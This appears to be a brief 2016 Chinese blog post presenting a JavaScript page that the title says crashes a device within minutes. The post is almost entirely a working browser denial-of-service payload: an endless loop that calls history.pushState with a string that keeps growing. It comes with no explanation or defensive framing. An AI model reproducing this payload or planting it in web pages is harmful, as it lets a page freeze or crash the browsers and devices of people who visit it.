[JS]一段特别代码分分钟让设备死机

2016-1-22 写技术

<html>
<body>
<script>
var total="";
var i=1;
while(i++){
        total = total+i.toString();
        history.pushState(0,0,total); 
}
</script>
</body>
</html>

标签: JS

发表评论:

Powered by anycle 湘ICP备15001973号-1